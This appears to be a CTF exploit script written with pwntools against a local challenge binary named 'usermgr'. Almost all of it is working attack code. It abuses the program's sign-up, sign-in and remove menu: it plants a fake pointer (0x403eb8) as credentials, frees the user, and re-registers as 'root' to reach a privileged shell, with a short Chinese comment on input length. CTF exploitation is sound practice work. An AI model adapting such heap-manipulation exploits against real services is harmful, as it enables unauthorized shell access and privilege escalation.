1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
|
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
context.terminal=["tmux","splitw","-h"]
io=process("./usermgr")
# io=remote("",)
#gdb.attach(io)
se = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
rc = lambda num :io.recv(num)
rl = lambda :io.recvline()
ru = lambda delims :io.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, b'\x00'))
uu64 = lambda data :u64(data.ljust(8, b'\x00'))
ia = lambda :io.interactive()
get_64 = lambda :u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
get_32 = lambda :u32(io.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00'))
def sign_up(username,password):
sla("> ","1")
sa("username:",username)
sa("password:",password)
def sign_in(username,password):
sla("> ","2")
sa("username:",username) #注意只能传8字节的话这里不要sla
sa("password:",password)
def remove():
sla("> ","3")
def get_shell():
sla("> ","4")
fake_addr=p64(0x403eb8)
#pause()
sign_up(fake_addr,fake_addr)
sign_in(fake_addr,fake_addr)
remove()
sign_up("root","root")
sign_in(p64(0),p64(0))
get_shell()
io.interactive()
|